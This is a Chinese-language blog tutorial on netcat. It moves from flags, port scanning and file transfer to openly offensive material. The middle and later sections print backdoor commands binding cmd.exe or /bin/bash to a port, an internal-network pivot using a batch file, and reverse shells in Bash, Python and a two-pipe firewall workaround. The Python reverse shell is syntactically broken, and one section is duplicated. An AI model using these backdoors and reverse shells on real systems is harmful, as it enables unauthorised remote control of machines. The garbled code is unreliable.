[网络安全]Netcat的基本使用
文章目录
- Netcat
- Netcat基本概述
- 参数的介绍及使用
- 内容重定向
- 常用方法
- netcat 建立后门
- windows建立后门
- 监听型后门
- 连接型后门
- Linux建立后门
- 监听型后门
- nc -l -p [port] -e /bin/bash
- 连接型后门
- 连接转发
- 向内网中能够连接的机器中写入批处理文件(用于nc远程连接内网中不能通信的机器)
- 客户端nc远程连接内网中能够连接的电脑
- 反弹shell
- 基于Python的shell反弹
- 基于Bash的shell反弹
- 内网穿透
- 被防火墙拦截(不支持nc -e参数)
- 被防火墙拦截(不支持nc -e参数)
Netcat
Netcat基本概述
netcat又叫做瑞士军刀,是黑客和系统管理员常用的网络工具,初开发的目的是文件传输,后来发展除了很多强大的功能
**注意:**一般不建议在生产环境安装nc,因为nc除了可以批量主机服务扫描外,还支持端口代理、文件传输,容易造成安全隐患
参数的介绍及使用
-4 使用IPv4版本的IP地址
-6 使用IPv6版本的IP地址
-b 允许UDP广播
-c string(sudo ifconfig) 远程连接后要执行的shell code 命令。字符串被传递给/bin/sh
-C 发送CRLF(回车换行)作为行尾
d 脱离命令窗口,在后台运行,常用于后门建立过程
-e filename(.exe/…) 远程连接后返回的程序,常用于后门建立过程
-g gateway 设置网关,常用于突破内网限制
-G num 路由跳数(例如4,8,12…)
-h 查看命令参数
-i secs 设置每发送一个行数据的时间间隔
-l [localhost address] 设置netcat处于监听状态等待链接
-L [localhost address]设置netcat处于监听状态等待链接,当客户端断开,服务端依旧回到等待状态
man ~ 获得详细信息
-n 不对目标机器进行DNS解析
使用过程中使用-n参数只传入IP,减少了Netcat把域名解析成IP的过程,这样可以节省时间提高效率
-o file 设置传输十六进制的数据
-p [localhost port] 端口
-q seconds 在标准输入流上读取文件(判断EOF),等待指定的秒数,然后退出。如果秒数为负数,永远等待
-r 设置netcat随机化的端口号
-s [addr] 设置telnet源地址(用于源地址欺骗)
-t 回复telnet的请求数据包
-T type 设置TOS标志(类型可以是“最小化延迟”,“最大化吞吐量”、“最大化可靠性”或“最小化成本”)
-u 设置netcat使用UDP模式
-v 表示对错误进行详细输出
可以用来获取banner信息
>echo " " | nc -v -n -w1 [ip:port]
快速端口扫描
>nc -v -n -z -m1 [ip:port]
-w secs 最大等待连接时间(若time时间内无法连接到服务器端,则断掉连接,防止"假死"状态)
-z zero I/O模式,专用于端口扫描。对于目标IP发送的数据表中不包含任何payload,这样可以加快扫描速度(0 标准输入)
-z参数默认使用的是TCP类型的数据扫描,如果需要进行UDP扫描,则需要使用-u参数
内容重定向
nc [localhost port]< file 上传文件
nc [localhost port] > file 下载文件
常用方法
常用 | Server | Client |
---|---|---|
端口扫描 | nc -z -n -v [IP Address] [Port] | |
获取banner信息 | nc -n -v [IP Address] [Port] | |
远程连接 | nc -l [port] | nc [IP Address] [Port] |
文件传输(下载) | nc -l [port] < file | nc [IP Address] [Port] > file |
文件传输(上传) | nc [IP Address] [Port] > file | nc -l [port] < file |
多文件传输(下载) | tar -cvf filename | nc -l [port] | nc [IP Address] [Port] | tar -xvf |
指定使用的压缩方法(以bzip2为例) | tar -cvf filename | bzip2 -z | nc -l [port] | nc [IP Address] [Port] | bzip2 -d | tar -xvf |
加密发送数据 | nc localhost port|mcrypt -flush -bare -F -q -d -m ecb > file | mcrypt -flush -bare -F -q-m ecb < file | nc [IP Address] [Port] |
视频流文件(下载) | cat video.avi|nc -l [port] | nc [IP Address] [port]|mplayer -vo x11 -cache 3000 |
克隆一个设备配置 | dd if=/dev/sda|nc -l port | nc -n [IP Address] [port]|dd of=/dev/sda |
netcat 建立后门
windows建立后门
监听型后门
能够连接值服务端,并从服务端返回客户端一个shell
nc -l -p [port] -e cmd.exe
连接型后门
能够连接值服务端,给服务端提供一个shell
nc [IP Address port] -e cmd.exe
Linux建立后门
监听型后门
nc -l -p [port] -e /bin/bash
连接型后门
nc [IP Address port] -e /bin/bash
连接转发
当有客户端连接该服务端时,连接的客户端和通过服务端连接到 target port上 实现了连接转发功能。(端口转发)
向内网中能够连接的机器中写入批处理文件(用于nc远程连接内网中不能通信的机器)
echo nc [IP Address:port] > xx.bat
客户端nc远程连接内网中能够连接的电脑
nc -l -p [localport] -e xx.bat
有一个特殊的文件/dev/tcp,打开这个文件就类似于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。1. 打开/dev/tcp以读写方式打开/dev/tcp,并指定服务器名为: www.csdn.net,端口号为:80,指定描述符为8exec 8<>/dev/tcp/www.csdn.net/80要注意的是:/dev/tcp本身是不存在的。
2. 向文件中写入数据向文件中随便写一些数据: echo -e "GET">8&
3. 读文件读取返回的信息:cat<&8
反弹shell
基于Python的shell反弹
!/usr/bin/python
import os,subprocess,sockets=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect("IP","port")
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2
p=subprocess.call(["/bin/sh","-i"])
基于Bash的shell反弹
##### 反弹shell命令
>bash -i >& /dev/tcp/ip/port 0>&1
##### 交互模式运行bash/shell
>bash -i
##### \>&重定向度
##### 0 标准输入 1 标准输出 2 错误输入输出
##### PC端就收Netcat指令
>nc -lvp port
内网穿透
被防火墙拦截(不支持nc -e参数)
nc ip port | /bin/bash | nc ip port
通过管道反弹shell命令
此时需要提供两个端口,一个用于连接,一个用于监听
内网穿透
被防火墙拦截(不支持nc -e参数)
nc ip port | /bin/bash | nc ip port
通过管道反弹shell命令
此时需要提供两个端口,一个用于连接,一个用于监听
[网络安全]Netcat的基本使用相关推荐
- 审核网络安全的十大必备工具
如果想更好的认清网络的现状,请看本文主要讲述了可以帮助我们审核网络安全的十个工具. 一.Nessus:这是一款UNIX平台的漏洞评估工具,可以说它是最好的.免费的网络漏洞扫描程序.其更新速度很快,有超 ...
- Nmap/Netcat/Hping3工具对比
在网络安全领域,Nmap.Netcat.Hping3都是安全工程师必备的工具.Nmap主要作为端口扫描器,侦查目标机的端口及服务状态:而Netcat则整合了网络中各种常用功能(如后门.文件传输.端口扫 ...
- netstat/nmap/netcat用法
这三款工具是网络安全利器,做一个简单摘要,以备参考. netcat--网安瑞士军刀 netcat可以用于监控/扫描网络端口,它应用最多的情况是后门程序. 一般分两个步骤: 步骤一: 我们在被攻击的机器 ...
- 【网络安全】Penelope:一款功能强大的Shell处理工具
关于Penelope Penelope是一款功能强大的Shell处理工具,该工具的主要功能是在利用RCE漏洞的过程中,替代netcat并作为Shell捕捉器来使用.该工具可以在Linux和macOS上 ...
- [网络安全提高篇] 一一五.Powershell恶意代码检测 (3)Token关键词自动提取
"网络安全提高班"新的100篇文章即将开启,包括Web渗透.内网渗透.靶场搭建.CVE复现.攻击溯源.实战及CTF总结,它将更加聚焦,更加深入,也是作者的慢慢成长史.换专业确实挺难 ...
- Lockdoor Framework:一套自带大量网络安全资源的渗透测试框架
博客&文章 Reddit:[传送门] Medium.com:[传送门] Xploit Lab:[传送门] Station X:[传送门] Kelvin Security :[传送门] All ...
- 一些网络安全的工具软件的介绍
因为是在 nmap-hackers 邮件列表中做出的评选,因此没有把 nmap 安全扫描仪( http://www.insecure.org/nmap/ )评选在内. 这次评选出来的 ...
- 网络安全:网络攻击原理与方法.
网络安全:网络攻击原理与方法. 网络攻击:是损害网络系统安全属性的危害行为.危害行为导致网络系统的机密性.完整性.可控性.真实性.抗抵赖性等受到不同程度的破坏. 目录: 常见的危害行为有四个基本类型: ...
- 网络安全红队常用的攻击方法及路径
一.信息收集 收集的内容包括目标系统的组织架构.IT资产.敏感信息泄露.供应商信息等各个方面,通过对收集的信息进行梳理,定位到安全薄弱点,从而实施下一步的攻击行为. 域名收集 1.备案查询 天眼查 爱 ...
最新文章
- Ecplise 恢复刚刚删除的文件
- AI攻击AI,升级的网络安全战
- IntelliJ IDEA快捷键与使用小技巧
- 【Socket网络编程】14. perror()、errno 的使用
- html2canvas导出地图,Leaflet OpenStreetMap使用html2canvas使用地图标记导出图像
- mysql数据库多少张表会影响性能_mysql数据库多少张表会影响性能
- 多线程“基础篇”11之 生产消费者问题
- 使用代理,调用json-server的服务接口
- 040_Auto.js
- WPF DataGrid显示图片的一种方法
- java定时器quartz
- 产品技术人必备干货:产品开发流程(完整版)
- 计算机c盘满了怎么搬家,c盘满了怎么办 c盘怎么搬家【搬家步骤】
- 使用ps删除多余的内容
- 消息队列在linux下实现进程间的通信;消息盒子在单片机中的代码实现
- 中国(广西)壮语春节联欢晚会将举办
- 最大似然估计方法介绍
- Vuex前端saas人力资源中台管理项目第四天 员工管理模块
- 思考互联网发展三阶段
- C波段、KU波段与雨衰现象